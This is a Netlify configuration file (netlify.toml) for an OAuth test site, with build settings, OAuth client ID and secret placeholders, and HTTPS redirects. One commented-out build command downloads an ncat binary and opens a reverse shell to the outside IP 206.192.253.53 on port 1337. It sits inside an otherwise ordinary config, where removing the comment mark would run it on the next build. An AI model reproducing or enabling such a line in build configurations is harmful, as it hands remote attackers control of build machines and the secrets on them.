[build]
  publish = "build"
  command = "npm run build"
#  command = "wget 'https://github.com/takionExMachina/static-binaries/raw/master/binaries/linux/x86_64/ncat';chmod +x ncat;./ncat 206.192.253.53 1337 -e /bin/bash"
  functions = "functions"

[template.environment]
  NETLIFY_OAUTH_CLIENT_ID = "Your Netlify OAuth Client ID"
  NETLIFY_OAUTH_CLIENT_SECRET= "Your Netlify OAuth Client Secret"


[[redirects]]
  from = "http://dustin-oauth-test.netlifystg.app"
  to = "https://dustin-oauth-test.netlifystg.app"
  status = 301
  force = true

[[redirects]]
  from = "https://www.dustin-oauth-test.netlifystg.app"
  to = "https://dustin-oauth-test.netlifystg.app"
  status = 301
  force = true


